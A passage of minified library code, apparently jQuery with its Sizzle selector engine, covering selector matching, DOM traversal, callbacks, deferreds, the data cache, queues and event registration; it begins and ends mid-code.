W.CHILD.test(a[0])?null:(a[3]?a[2]=a[4]||a[5]||"":c&&U.test(c)&&(b=g(c,!0))&&(b=c.indexOf(")",c.length-b)-c.length)&&(a[0]=a[0].slice(0,b),a[2]=c.slice(0,b)),a.slice(0,3))}},filter:{TAG:function(a){var b=a.replace(ba,ca).toLowerCase();return"*"===a?function(){return!0}:function(a){return a.nodeName&&a.nodeName.toLowerCase()===b}},CLASS:function(a){var b=y[a+" "];return b||(b=new RegExp("(^|"+L+")"+a+"("+L+"|$)"))&&y(a,function(a){return b.test("string"==typeof a.className&&a.className||"undefined"!=typeof a.getAttribute&&a.getAttribute("class")||"")})},ATTR:function(a,b,c){return function(d){var e=fa.attr(d,a);return null==e?"!="===b:b?(e+="","="===b?e===c:"!="===b?e!==c:"^="===b?c&&0===e.indexOf(c):"*="===b?c&&e.indexOf(c)>-1:"$="===b?c&&e.slice(-c.length)===c:"~="===b?(" "+e.replace(P," ")+" ").indexOf(c)>-1:"|="===b?e===c||e.slice(0,c.length+1)===c+"-":!1):!0}},CHILD:function(a,b,c,d,e){var f="nth"!==a.slice(0,3),g="last"!==a.slice(-4),h="of-type"===b;return 1===d&&0===e?function(a){return!!a.parentNode}:function(b,c,i){var j,k,l,m,n,o,p=f!==g?"nextSibling":"previousSibling",q=b.parentNode,r=h&&b.nodeName.toLowerCase(),s=!i&&!h,t=!1;if(q){if(f){while(p){m=b;while(m=m[p])if(h?m.nodeName.toLowerCase()===r:1===m.nodeType)return!1;o=p="only"===a&&!o&&"nextSibling"}return!0}if(o=[g?q.firstChild:q.lastChild],g&&s){m=q,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n&&j[2],m=n&&q.childNodes[n];while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if(1===m.nodeType&&++t&&m===b){k[a]=[w,n,t];break}}else if(s&&(m=b,l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),j=k[a]||[],n=j[0]===w&&j[1],t=n),t===!1)while(m=++n&&m&&m[p]||(t=n=0)||o.pop())if((h?m.nodeName.toLowerCase()===r:1===m.nodeType)&&++t&&(s&&(l=m[u]||(m[u]={}),k=l[m.uniqueID]||(l[m.uniqueID]={}),k[a]=[w,t]),m===b))break;return t-=e,t===d||t%d===0&&t/d>=0}}},PSEUDO:function(a,b){var c,e=d.pseudos[a]||d.setFilters[a.toLowerCase()]||fa.error("unsupported pseudo: "+a);return e[u]?e(b):e.length>1?(c=[a,a,"",b],d.setFilters.hasOwnProperty(a.toLowerCase())?ha(function(a,c){var d,f=e(a,b),g=f.length;while(g--)d=J(a,f[g]),a[d]=!(c[d]=f[g])}):function(a){return e(a,0,c)}):e}},pseudos:{not:ha(function(a){var b=[],c=[],d=h(a.replace(Q,"$1"));return d[u]?ha(function(a,b,c,e){var f,g=d(a,null,e,[]),h=a.length;while(h--)(f=g[h])&&(a[h]=!(b[h]=f))}):function(a,e,f){return b[0]=a,d(b,null,f,c),b[0]=null,!c.pop()}}),has:ha(function(a){return function(b){return fa(a,b).length>0}}),contains:ha(function(a){return a=a.replace(ba,ca),function(b){return(b.textContent||b.innerText||e(b)).indexOf(a)>-1}}),lang:ha(function(a){return V.test(a||"")||fa.error("unsupported lang: "+a),a=a.replace(ba,ca).toLowerCase(),function(b){var c;do if(c=p?b.lang:b.getAttribute("xml:lang")||b.getAttribute("lang"))return c=c.toLowerCase(),c===a||0===c.indexOf(a+"-");while((b=b.parentNode)&&1===b.nodeType);return!1}}),target:function(b){var c=a.location&&a.location.hash;return c&&c.slice(1)===b.id},root:function(a){return a===o},focus:function(a){return a===n.activeElement&&(!n.hasFocus||n.hasFocus())&&!!(a.type||a.href||~a.tabIndex)},enabled:function(a){return a.disabled===!1},disabled:function(a){return a.disabled===!0},checked:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&!!a.checked||"option"===b&&!!a.selected},selected:function(a){return a.parentNode&&a.parentNode.selectedIndex,a.selected===!0},empty:function(a){for(a=a.firstChild;a;a=a.nextSibling)if(a.nodeType<6)return!1;return!0},parent:function(a){return!d.pseudos.empty(a)},header:function(a){return Y.test(a.nodeName)},input:function(a){return X.test(a.nodeName)},button:function(a){var b=a.nodeName.toLowerCase();return"input"===b&&"button"===a.type||"button"===b},text:function(a){var b;return"input"===a.nodeName.toLowerCase()&&"text"===a.type&&(null==(b=a.getAttribute("type"))||"text"===b.toLowerCase())},first:na(function(){return[0]}),last:na(function(a,b){return[b-1]}),eq:na(function(a,b,c){return[0>c?c+b:c]}),even:na(function(a,b){for(var c=0;b>c;c+=2)a.push(c);return a}),odd:na(function(a,b){for(var c=1;b>c;c+=2)a.push(c);return a}),lt:na(function(a,b,c){for(var d=0>c?c+b:c;--d>=0;)a.push(d);return a}),gt:na(function(a,b,c){for(var d=0>c?c+b:c;++d<b;)a.push(d);return a})}},d.pseudos.nth=d.pseudos.eq;for(b in{radio:!0,checkbox:!0,file:!0,password:!0,image:!0})d.pseudos[b]=la(b);for(b in{submit:!0,reset:!0})d.pseudos[b]=ma(b);function pa(){}pa.prototype=d.filters=d.pseudos,d.setFilters=new pa,g=fa.tokenize=function(a,b){var c,e,f,g,h,i,j,k=z[a+" "];if(k)return b?0:k.slice(0);h=a,i=[],j=d.preFilter;while(h){c&&!(e=R.exec(h))||(e&&(h=h.slice(e[0].length)||h),i.push(f=[])),c=!1,(e=S.exec(h))&&(c=e.shift(),f.push({value:c,type:e[0].replace(Q," ")}),h=h.slice(c.length));for(g in d.filter)!(e=W[g].exec(h))||j[g]&&!(e=j[g](e))||(c=e.shift(),f.push({value:c,type:g,matches:e}),h=h.slice(c.length));if(!c)break}return b?h.length:h?fa.error(a):z(a,i).slice(0)};function qa(a){for(var b=0,c=a.length,d="";c>b;b++)d+=a[b].value;return d}function ra(a,b,c){var d=b.dir,e=c&&"parentNode"===d,f=x++;return b.first?function(b,c,f){while(b=b[d])if(1===b.nodeType||e)return a(b,c,f)}:function(b,c,g){var h,i,j,k=[w,f];if(g){while(b=b[d])if((1===b.nodeType||e)&&a(b,c,g))return!0}else while(b=b[d])if(1===b.nodeType||e){if(j=b[u]||(b[u]={}),i=j[b.uniqueID]||(j[b.uniqueID]={}),(h=i[d])&&h[0]===w&&h[1]===f)return k[2]=h[2];if(i[d]=k,k[2]=a(b,c,g))return!0}}}function sa(a){return a.length>1?function(b,c,d){var e=a.length;while(e--)if(!a[e](b,c,d))return!1;return!0}:a[0]}function ta(a,b,c){for(var d=0,e=b.length;e>d;d++)fa(a,b[d],c);return c}function ua(a,b,c,d,e){for(var f,g=[],h=0,i=a.length,j=null!=b;i>h;h++)(f=a[h])&&(c&&!c(f,d,e)||(g.push(f),j&&b.push(h)));return g}function va(a,b,c,d,e,f){return d&&!d[u]&&(d=va(d)),e&&!e[u]&&(e=va(e,f)),ha(function(f,g,h,i){var j,k,l,m=[],n=[],o=g.length,p=f||ta(b||"*",h.nodeType?[h]:h,[]),q=!a||!f&&b?p:ua(p,m,a,h,i),r=c?e||(f?a:o||d)?[]:g:q;if(c&&c(q,r,h,i),d){j=ua(r,n),d(j,[],h,i),k=j.length;while(k--)(l=j[k])&&(r[n[k]]=!(q[n[k]]=l))}if(f){if(e||a){if(e){j=[],k=r.length;while(k--)(l=r[k])&&j.push(q[k]=l);e(null,r=[],j,i)}k=r.length;while(k--)(l=r[k])&&(j=e?J(f,l):m[k])>-1&&(f[j]=!(g[j]=l))}}else r=ua(r===g?r.splice(o,r.length):r),e?e(null,g,r,i):H.apply(g,r)})}function wa(a){for(var b,c,e,f=a.length,g=d.relative[a[0].type],h=g||d.relative[" "],i=g?1:0,k=ra(function(a){return a===b},h,!0),l=ra(function(a){return J(b,a)>-1},h,!0),m=[function(a,c,d){var e=!g&&(d||c!==j)||((b=c).nodeType?k(a,c,d):l(a,c,d));return b=null,e}];f>i;i++)if(c=d.relative[a[i].type])m=[ra(sa(m),c)];else{if(c=d.filter[a[i].type].apply(null,a[i].matches),c[u]){for(e=++i;f>e;e++)if(d.relative[a[e].type])break;return va(i>1&&sa(m),i>1&&qa(a.slice(0,i-1).concat({value:" "===a[i-2].type?"*":""})).replace(Q,"$1"),c,e>i&&wa(a.slice(i,e)),f>e&&wa(a=a.slice(e)),f>e&&qa(a))}m.push(c)}return sa(m)}function xa(a,b){var c=b.length>0,e=a.length>0,f=function(f,g,h,i,k){var l,o,q,r=0,s="0",t=f&&[],u=[],v=j,x=f||e&&d.find.TAG("*",k),y=w+=null==v?1:Math.random()||.1,z=x.length;for(k&&(j=g===n||g||k);s!==z&&null!=(l=x[s]);s++){if(e&&l){o=0,g||l.ownerDocument===n||(m(l),h=!p);while(q=a[o++])if(q(l,g||n,h)){i.push(l);break}k&&(w=y)}c&&((l=!q&&l)&&r--,f&&t.push(l))}if(r+=s,c&&s!==r){o=0;while(q=b[o++])q(t,u,g,h);if(f){if(r>0)while(s--)t[s]||u[s]||(u[s]=F.call(i));u=ua(u)}H.apply(i,u),k&&!f&&u.length>0&&r+b.length>1&&fa.uniqueSort(i)}return k&&(w=y,j=v),t};return c?ha(f):f}return h=fa.compile=function(a,b){var c,d=[],e=[],f=A[a+" "];if(!f){b||(b=g(a)),c=b.length;while(c--)f=wa(b[c]),f[u]?d.push(f):e.push(f);f=A(a,xa(e,d)),f.selector=a}return f},i=fa.select=function(a,b,e,f){var i,j,k,l,m,n="function"==typeof a&&a,o=!f&&g(a=n.selector||a);if(e=e||[],1===o.length){if(j=o[0]=o[0].slice(0),j.length>2&&"ID"===(k=j[0]).type&&c.getById&&9===b.nodeType&&p&&d.relative[j[1].type]){if(b=(d.find.ID(k.matches[0].replace(ba,ca),b)||[])[0],!b)return e;n&&(b=b.parentNode),a=a.slice(j.shift().value.length)}i=W.needsContext.test(a)?0:j.length;while(i--){if(k=j[i],d.relative[l=k.type])break;if((m=d.find[l])&&(f=m(k.matches[0].replace(ba,ca),_.test(j[0].type)&&oa(b.parentNode)||b))){if(j.splice(i,1),a=f.length&&qa(j),!a)return H.apply(e,f),e;break}}}return(n||h(a,o))(f,b,!p,e,!b||_.test(a)&&oa(b.parentNode)||b),e},c.sortStable=u.split("").sort(B).join("")===u,c.detectDuplicates=!!l,m(),c.sortDetached=ia(function(a){return 1&a.compareDocumentPosition(n.createElement("div"))}),ia(function(a){return a.innerHTML="<a href='#'></a>","#"===a.firstChild.getAttribute("href")})||ja("type|href|height|width",function(a,b,c){return c?void 0:a.getAttribute(b,"type"===b.toLowerCase()?1:2)}),c.attributes&&ia(function(a){return a.innerHTML="<input/>",a.firstChild.setAttribute("value",""),""===a.firstChild.getAttribute("value")})||ja("value",function(a,b,c){return c||"input"!==a.nodeName.toLowerCase()?void 0:a.defaultValue}),ia(function(a){return null==a.getAttribute("disabled")})||ja(K,function(a,b,c){var d;return c?void 0:a[b]===!0?b.toLowerCase():(d=a.getAttributeNode(b))&&d.specified?d.value:null}),fa}(a);n.find=t,n.expr=t.selectors,n.expr[":"]=n.expr.pseudos,n.uniqueSort=n.unique=t.uniqueSort,n.text=t.getText,n.isXMLDoc=t.isXML,n.contains=t.contains;var u=function(a,b,c){var d=[],e=void 0!==c;while((a=a[b])&&9!==a.nodeType)if(1===a.nodeType){if(e&&n(a).is(c))break;d.push(a)}return d},v=function(a,b){for(var c=[];a;a=a.nextSibling)1===a.nodeType&&a!==b&&c.push(a);return c},w=n.expr.match.needsContext,x=/^<([\w-]+)\s*\/?>(?:<\/\1>|)$/,y=/^.[^:#\[\.,]*$/;function z(a,b,c){if(n.isFunction(b))return n.grep(a,function(a,d){return!!b.call(a,d,a)!==c});if(b.nodeType)return n.grep(a,function(a){return a===b!==c});if("string"==typeof b){if(y.test(b))return n.filter(b,a,c);b=n.filter(b,a)}return n.grep(a,function(a){return h.call(b,a)>-1!==c})}n.filter=function(a,b,c){var d=b[0];return c&&(a=":not("+a+")"),1===b.length&&1===d.nodeType?n.find.matchesSelector(d,a)?[d]:[]:n.find.matches(a,n.grep(b,function(a){return 1===a.nodeType}))},n.fn.extend({find:function(a){var b,c=this.length,d=[],e=this;if("string"!=typeof a)return this.pushStack(n(a).filter(function(){for(b=0;c>b;b++)if(n.contains(e[b],this))return!0}));for(b=0;c>b;b++)n.find(a,e[b],d);return d=this.pushStack(c>1?n.unique(d):d),d.selector=this.selector?this.selector+" "+a:a,d},filter:function(a){return this.pushStack(z(this,a||[],!1))},not:function(a){return this.pushStack(z(this,a||[],!0))},is:function(a){return!!z(this,"string"==typeof a&&w.test(a)?n(a):a||[],!1).length}});var A,B=/^(?:\s*(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=n.fn.init=function(a,b,c){var e,f;if(!a)return this;if(c=c||A,"string"==typeof a){if(e="<"===a[0]&&">"===a[a.length-1]&&a.length>=3?[null,a,null]:B.exec(a),!e||!e[1]&&b)return!b||b.jquery?(b||c).find(a):this.constructor(b).find(a);if(e[1]){if(b=b instanceof n?b[0]:b,n.merge(this,n.parseHTML(e[1],b&&b.nodeType?b.ownerDocument||b:d,!0)),x.test(e[1])&&n.isPlainObject(b))for(e in b)n.isFunction(this[e])?this[e](b[e]):this.attr(e,b[e]);return this}return f=d.getElementById(e[2]),f&&f.parentNode&&(this.length=1,this[0]=f),this.context=d,this.selector=a,this}return a.nodeType?(this.context=this[0]=a,this.length=1,this):n.isFunction(a)?void 0!==c.ready?c.ready(a):a(n):(void 0!==a.selector&&(this.selector=a.selector,this.context=a.context),n.makeArray(a,this))};C.prototype=n.fn,A=n(d);var D=/^(?:parents|prev(?:Until|All))/,E={children:!0,contents:!0,next:!0,prev:!0};n.fn.extend({has:function(a){var b=n(a,this),c=b.length;return this.filter(function(){for(var a=0;c>a;a++)if(n.contains(this,b[a]))return!0})},closest:function(a,b){for(var c,d=0,e=this.length,f=[],g=w.test(a)||"string"!=typeof a?n(a,b||this.context):0;e>d;d++)for(c=this[d];c&&c!==b;c=c.parentNode)if(c.nodeType<11&&(g?g.index(c)>-1:1===c.nodeType&&n.find.matchesSelector(c,a))){f.push(c);break}return this.pushStack(f.length>1?n.uniqueSort(f):f)},index:function(a){return a?"string"==typeof a?h.call(n(a),this[0]):h.call(this,a.jquery?a[0]:a):this[0]&&this[0].parentNode?this.first().prevAll().length:-1},add:function(a,b){return this.pushStack(n.uniqueSort(n.merge(this.get(),n(a,b))))},addBack:function(a){return this.add(null==a?this.prevObject:this.prevObject.filter(a))}});function F(a,b){while((a=a[b])&&1!==a.nodeType);return a}n.each({parent:function(a){var b=a.parentNode;return b&&11!==b.nodeType?b:null},parents:function(a){return u(a,"parentNode")},parentsUntil:function(a,b,c){return u(a,"parentNode",c)},next:function(a){return F(a,"nextSibling")},prev:function(a){return F(a,"previousSibling")},nextAll:function(a){return u(a,"nextSibling")},prevAll:function(a){return u(a,"previousSibling")},nextUntil:function(a,b,c){return u(a,"nextSibling",c)},prevUntil:function(a,b,c){return u(a,"previousSibling",c)},siblings:function(a){return v((a.parentNode||{}).firstChild,a)},children:function(a){return v(a.firstChild)},contents:function(a){return a.contentDocument||n.merge([],a.childNodes)}},function(a,b){n.fn[a]=function(c,d){var e=n.map(this,b,c);return"Until"!==a.slice(-5)&&(d=c),d&&"string"==typeof d&&(e=n.filter(d,e)),this.length>1&&(E[a]||n.uniqueSort(e),D.test(a)&&e.reverse()),this.pushStack(e)}});var G=/\S+/g;function H(a){var b={};return n.each(a.match(G)||[],function(a,c){b[c]=!0}),b}n.Callbacks=function(a){a="string"==typeof a?H(a):n.extend({},a);var b,c,d,e,f=[],g=[],h=-1,i=function(){for(e=a.once,d=b=!0;g.length;h=-1){c=g.shift();while(++h<f.length)f[h].apply(c[0],c[1])===!1&&a.stopOnFalse&&(h=f.length,c=!1)}a.memory||(c=!1),b=!1,e&&(f=c?[]:"")},j={add:function(){return f&&(c&&!b&&(h=f.length-1,g.push(c)),function d(b){n.each(b,function(b,c){n.isFunction(c)?a.unique&&j.has(c)||f.push(c):c&&c.length&&"string"!==n.type(c)&&d(c)})}(arguments),c&&!b&&i()),this},remove:function(){return n.each(arguments,function(a,b){var c;while((c=n.inArray(b,f,c))>-1)f.splice(c,1),h>=c&&h--}),this},has:function(a){return a?n.inArray(a,f)>-1:f.length>0},empty:function(){return f&&(f=[]),this},disable:function(){return e=g=[],f=c="",this},disabled:function(){return!f},lock:function(){return e=g=[],c||(f=c=""),this},locked:function(){return!!e},fireWith:function(a,c){return e||(c=c||[],c=[a,c.slice?c.slice():c],g.push(c),b||i()),this},fire:function(){return j.fireWith(this,arguments),this},fired:function(){return!!d}};return j},n.extend({Deferred:function(a){var b=[["resolve","done",n.Callbacks("once memory"),"resolved"],["reject","fail",n.Callbacks("once memory"),"rejected"],["notify","progress",n.Callbacks("memory")]],c="pending",d={state:function(){return c},always:function(){return e.done(arguments).fail(arguments),this},then:function(){var a=arguments;return n.Deferred(function(c){n.each(b,function(b,f){var g=n.isFunction(a[b])&&a[b];e[f[1]](function(){var a=g&&g.apply(this,arguments);a&&n.isFunction(a.promise)?a.promise().progress(c.notify).done(c.resolve).fail(c.reject):c[f[0]+"With"](this===d?c.promise():this,g?[a]:arguments)})}),a=null}).promise()},promise:function(a){return null!=a?n.extend(a,d):d}},e={};return d.pipe=d.then,n.each(b,function(a,f){var g=f[2],h=f[3];d[f[1]]=g.add,h&&g.add(function(){c=h},b[1^a][2].disable,b[2][2].lock),e[f[0]]=function(){return e[f[0]+"With"](this===e?d:this,arguments),this},e[f[0]+"With"]=g.fireWith}),d.promise(e),a&&a.call(e,e),e},when:function(a){var b=0,c=e.call(arguments),d=c.length,f=1!==d||a&&n.isFunction(a.promise)?d:0,g=1===f?a:n.Deferred(),h=function(a,b,c){return function(d){b[a]=this,c[a]=arguments.length>1?e.call(arguments):d,c===i?g.notifyWith(b,c):--f||g.resolveWith(b,c)}},i,j,k;if(d>1)for(i=new Array(d),j=new Array(d),k=new Array(d);d>b;b++)c[b]&&n.isFunction(c[b].promise)?c[b].promise().progress(h(b,j,i)).done(h(b,k,c)).fail(g.reject):--f;return f||g.resolveWith(k,c),g.promise()}});var I;n.fn.ready=function(a){return n.ready.promise().done(a),this},n.extend({isReady:!1,readyWait:1,holdReady:function(a){a?n.readyWait++:n.ready(!0)},ready:function(a){(a===!0?--n.readyWait:n.isReady)||(n.isReady=!0,a!==!0&&--n.readyWait>0||(I.resolveWith(d,[n]),n.fn.triggerHandler&&(n(d).triggerHandler("ready"),n(d).off("ready"))))}});function J(){d.removeEventListener("DOMContentLoaded",J),a.removeEventListener("load",J),n.ready()}n.ready.promise=function(b){return I||(I=n.Deferred(),"complete"===d.readyState||"loading"!==d.readyState&&!d.documentElement.doScroll?a.setTimeout(n.ready):(d.addEventListener("DOMContentLoaded",J),a.addEventListener("load",J))),I.promise(b)},n.ready.promise();var K=function(a,b,c,d,e,f,g){var h=0,i=a.length,j=null==c;if("object"===n.type(c)){e=!0;for(h in c)K(a,b,h,c[h],!0,f,g)}else if(void 0!==d&&(e=!0,n.isFunction(d)||(g=!0),j&&(g?(b.call(a,d),b=null):(j=b,b=function(a,b,c){return j.call(n(a),c)})),b))for(;i>h;h++)b(a[h],c,g?d:d.call(a[h],h,b(a[h],c)));return e?a:j?b.call(a):i?b(a[0],c):f},L=function(a){return 1===a.nodeType||9===a.nodeType||!+a.nodeType};function M(){this.expando=n.expando+M.uid++}M.uid=1,M.prototype={register:function(a,b){var c=b||{};return a.nodeType?a[this.expando]=c:Object.defineProperty(a,this.expando,{value:c,writable:!0,configurable:!0}),a[this.expando]},cache:function(a){if(!L(a))return{};var b=a[this.expando];return b||(b={},L(a)&&(a.nodeType?a[this.expando]=b:Object.defineProperty(a,this.expando,{value:b,configurable:!0}))),b},set:function(a,b,c){var d,e=this.cache(a);if("string"==typeof b)e[b]=c;else for(d in b)e[d]=b[d];return e},get:function(a,b){return void 0===b?this.cache(a):a[this.expando]&&a[this.expando][b]},access:function(a,b,c){var d;return void 0===b||b&&"string"==typeof b&&void 0===c?(d=this.get(a,b),void 0!==d?d:this.get(a,n.camelCase(b))):(this.set(a,b,c),void 0!==c?c:b)},remove:function(a,b){var c,d,e,f=a[this.expando];if(void 0!==f){if(void 0===b)this.register(a);else{n.isArray(b)?d=b.concat(b.map(n.camelCase)):(e=n.camelCase(b),b in f?d=[b,e]:(d=e,d=d in f?[d]:d.match(G)||[])),c=d.length;while(c--)delete f[d[c]]}(void 0===b||n.isEmptyObject(f))&&(a.nodeType?a[this.expando]=void 0:delete a[this.expando])}},hasData:function(a){var b=a[this.expando];return void 0!==b&&!n.isEmptyObject(b)}};var N=new M,O=new M,P=/^(?:\{[\w\W]*\}|\[[\w\W]*\])$/,Q=/[A-Z]/g;function R(a,b,c){var d;if(void 0===c&&1===a.nodeType)if(d="data-"+b.replace(Q,"-$&").toLowerCase(),c=a.getAttribute(d),"string"==typeof c){try{c="true"===c?!0:"false"===c?!1:"null"===c?null:+c+""===c?+c:P.test(c)?n.parseJSON(c):c;
}catch(e){}O.set(a,b,c)}else c=void 0;return c}n.extend({hasData:function(a){return O.hasData(a)||N.hasData(a)},data:function(a,b,c){return O.access(a,b,c)},removeData:function(a,b){O.remove(a,b)},_data:function(a,b,c){return N.access(a,b,c)},_removeData:function(a,b){N.remove(a,b)}}),n.fn.extend({data:function(a,b){var c,d,e,f=this[0],g=f&&f.attributes;if(void 0===a){if(this.length&&(e=O.get(f),1===f.nodeType&&!N.get(f,"hasDataAttrs"))){c=g.length;while(c--)g[c]&&(d=g[c].name,0===d.indexOf("data-")&&(d=n.camelCase(d.slice(5)),R(f,d,e[d])));N.set(f,"hasDataAttrs",!0)}return e}return"object"==typeof a?this.each(function(){O.set(this,a)}):K(this,function(b){var c,d;if(f&&void 0===b){if(c=O.get(f,a)||O.get(f,a.replace(Q,"-$&").toLowerCase()),void 0!==c)return c;if(d=n.camelCase(a),c=O.get(f,d),void 0!==c)return c;if(c=R(f,d,void 0),void 0!==c)return c}else d=n.camelCase(a),this.each(function(){var c=O.get(this,d);O.set(this,d,b),a.indexOf("-")>-1&&void 0!==c&&O.set(this,a,b)})},null,b,arguments.length>1,null,!0)},removeData:function(a){return this.each(function(){O.remove(this,a)})}}),n.extend({queue:function(a,b,c){var d;return a?(b=(b||"fx")+"queue",d=N.get(a,b),c&&(!d||n.isArray(c)?d=N.access(a,b,n.makeArray(c)):d.push(c)),d||[]):void 0},dequeue:function(a,b){b=b||"fx";var c=n.queue(a,b),d=c.length,e=c.shift(),f=n._queueHooks(a,b),g=function(){n.dequeue(a,b)};"inprogress"===e&&(e=c.shift(),d--),e&&("fx"===b&&c.unshift("inprogress"),delete f.stop,e.call(a,g,f)),!d&&f&&f.empty.fire()},_queueHooks:function(a,b){var c=b+"queueHooks";return N.get(a,c)||N.access(a,c,{empty:n.Callbacks("once memory").add(function(){N.remove(a,[b+"queue",c])})})}}),n.fn.extend({queue:function(a,b){var c=2;return"string"!=typeof a&&(b=a,a="fx",c--),arguments.length<c?n.queue(this[0],a):void 0===b?this:this.each(function(){var c=n.queue(this,a,b);n._queueHooks(this,a),"fx"===a&&"inprogress"!==c[0]&&n.dequeue(this,a)})},dequeue:function(a){return this.each(function(){n.dequeue(this,a)})},clearQueue:function(a){return this.queue(a||"fx",[])},promise:function(a,b){var c,d=1,e=n.Deferred(),f=this,g=this.length,h=function(){--d||e.resolveWith(f,[f])};"string"!=typeof a&&(b=a,a=void 0),a=a||"fx";while(g--)c=N.get(f[g],a+"queueHooks"),c&&c.empty&&(d++,c.empty.add(h));return h(),e.promise(b)}});var S=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,T=new RegExp("^(?:([+-])=|)("+S+")([a-z%]*)$","i"),U=["Top","Right","Bottom","Left"],V=function(a,b){return a=b||a,"none"===n.css(a,"display")||!n.contains(a.ownerDocument,a)};function W(a,b,c,d){var e,f=1,g=20,h=d?function(){return d.cur()}:function(){return n.css(a,b,"")},i=h(),j=c&&c[3]||(n.cssNumber[b]?"":"px"),k=(n.cssNumber[b]||"px"!==j&&+i)&&T.exec(n.css(a,b));if(k&&k[3]!==j){j=j||k[3],c=c||[],k=+i||1;do f=f||".5",k/=f,n.style(a,b,k+j);while(f!==(f=h()/i)&&1!==f&&--g)}return c&&(k=+k||+i||0,e=c[1]?k+(c[1]+1)*c[2]:+c[2],d&&(d.unit=j,d.start=k,d.end=e)),e}var X=/^(?:checkbox|radio)$/i,Y=/<([\w:-]+)/,Z=/^$|\/(?:java|ecma)script/i,$={option:[1,"<select multiple='multiple'>","</select>"],thead:[1,"<table>","</table>"],col:[2,"<table><colgroup>","</colgroup></table>"],tr:[2,"<table><tbody>","</tbody></table>"],td:[3,"<table><tbody><tr>","</tr></tbody></table>"],_default:[0,"",""]};$.optgroup=$.option,$.tbody=$.tfoot=$.colgroup=$.caption=$.thead,$.th=$.td;function _(a,b){var c="undefined"!=typeof a.getElementsByTagName?a.getElementsByTagName(b||"*"):"undefined"!=typeof a.querySelectorAll?a.querySelectorAll(b||"*"):[];return void 0===b||b&&n.nodeName(a,b)?n.merge([a],c):c}function aa(a,b){for(var c=0,d=a.length;d>c;c++)N.set(a[c],"globalEval",!b||N.get(b[c],"globalEval"))}var ba=/<|&#?\w+;/;function ca(a,b,c,d,e){for(var f,g,h,i,j,k,l=b.createDocumentFragment(),m=[],o=0,p=a.length;p>o;o++)if(f=a[o],f||0===f)if("object"===n.type(f))n.merge(m,f.nodeType?[f]:f);else if(ba.test(f)){g=g||l.appendChild(b.createElement("div")),h=(Y.exec(f)||["",""])[1].toLowerCase(),i=$[h]||$._default,g.innerHTML=i[1]+n.htmlPrefilter(f)+i[2],k=i[0];while(k--)g=g.lastChild;n.merge(m,g.childNodes),g=l.firstChild,g.textContent=""}else m.push(b.createTextNode(f));l.textContent="",o=0;while(f=m[o++])if(d&&n.inArray(f,d)>-1)e&&e.push(f);else if(j=n.contains(f.ownerDocument,f),g=_(l.appendChild(f),"script"),j&&aa(g),c){k=0;while(f=g[k++])Z.test(f.type||"")&&c.push(f)}return l}!function(){var a=d.createDocumentFragment(),b=a.appendChild(d.createElement("div")),c=d.createElement("input");c.setAttribute("type","radio"),c.setAttribute("checked","checked"),c.setAttribute("name","t"),b.appendChild(c),l.checkClone=b.cloneNode(!0).cloneNode(!0).lastChild.checked,b.innerHTML="<textarea>x</textarea>",l.noCloneChecked=!!b.cloneNode(!0).lastChild.defaultValue}();var da=/^key/,ea=/^(?:mouse|pointer|contextmenu|drag|drop)|click/,fa=/^([^.]*)(?:\.(.+)|)/;function ga(){return!0}function ha(){return!1}function ia(){try{return d.activeElement}catch(a){}}function ja(a,b,c,d,e,f){var g,h;if("object"==typeof b){"string"!=typeof c&&(d=d||c,c=void 0);for(h in b)ja(a,h,c,d,b[h],f);return a}if(null==d&&null==e?(e=c,d=c=void 0):null==e&&("string"==typeof c?(e=d,d=void 0):(e=d,d=c,c=void 0)),e===!1)e=ha;else if(!e)return a;return 1===f&&(g=e,e=function(a){return n().off(a),g.apply(this,arguments)},e.guid=g.guid||(g.guid=n.guid++)),a.each(function(){n.event.add(this,b,e,d,c)})}n.event={global:{},add:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=N.get(a);if(r){c.handler&&(f=c,c=f.handler,e=f.selector),c.guid||(c.guid=n.guid++),(i=r.events)||(i=r.events={}),(g=r.handle)||(g=r.handle=function(b){return"undefined"!=typeof n&&n.event.triggered!==b.type?n.event.dispatch.apply(a,arguments):void 0}),b=(b||"").match(G)||[""],j=b.length;while(j--)h=fa.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o&&(l=n.event.special[o]||{},o=(e?l.delegateType:l.bindType)||o,l=n.event.special[o]||{},k=n.extend({type:o,origType:q,data:d,handler:c,guid:c.guid,selector:e,needsContext:e&&n.expr.match.needsContext.test(e),namespace:p.join(".")},f),(m=i[o])||(m=i[o]=[],m.delegateCount=0,l.setup&&l.setup.call(a,d,p,g)!==!1||a.addEventListener&&a.addEventListener(o,g)),l.add&&(l.add.call(a,k),k.handler.guid||(k.handler.guid=c.guid)),e?m.splice(m.delegateCount++,0,k):m.push(k),n.event.global[o]=!0)}},remove:function(a,b,c,d,e){var f,g,h,i,j,k,l,m,o,p,q,r=N.hasData(a)&&N.get(a);if(r&&(i=r.events)){b=(b||"").match(G)||[""],j=b.length;while(j--)if(h=fa.exec(b[j])||[],o=q=h[1],p=(h[2]||"").split(".").sort(),o){l=n.event.special[o]||{},o=(d?l.delegateType:l.bindType)||o,m=i[o]||[],h=h[2]&&new RegExp("(^|\\.)"+p.join("\\.(?:.*\\.|)")+"(\\.|$)"),g=f=m.length;while(f--)k=m[f],!e&&q!==k.origType||c&&c.guid!==k.guid||h&&!h.test(k.namespace)||d&&d!==k.selector&&("**"!==d||!k.selector)||(m.splice(f,1),k.selector&&m.delegateCount--,l.remove&&l.remove.call(a,k));g&&!m.length&&(l.teardown&&l.teardown.call(a,p,r.handle)!==!1||n.removeEvent(a,o,r.handle),delete i[o])}else for(o in i)n.event.remove(a,o+b[j],c,d,!0);n.isEmptyObject(i)&&N.remove(a,"handle events")}},dispatch:function(a){a=n.event.fix(a);var 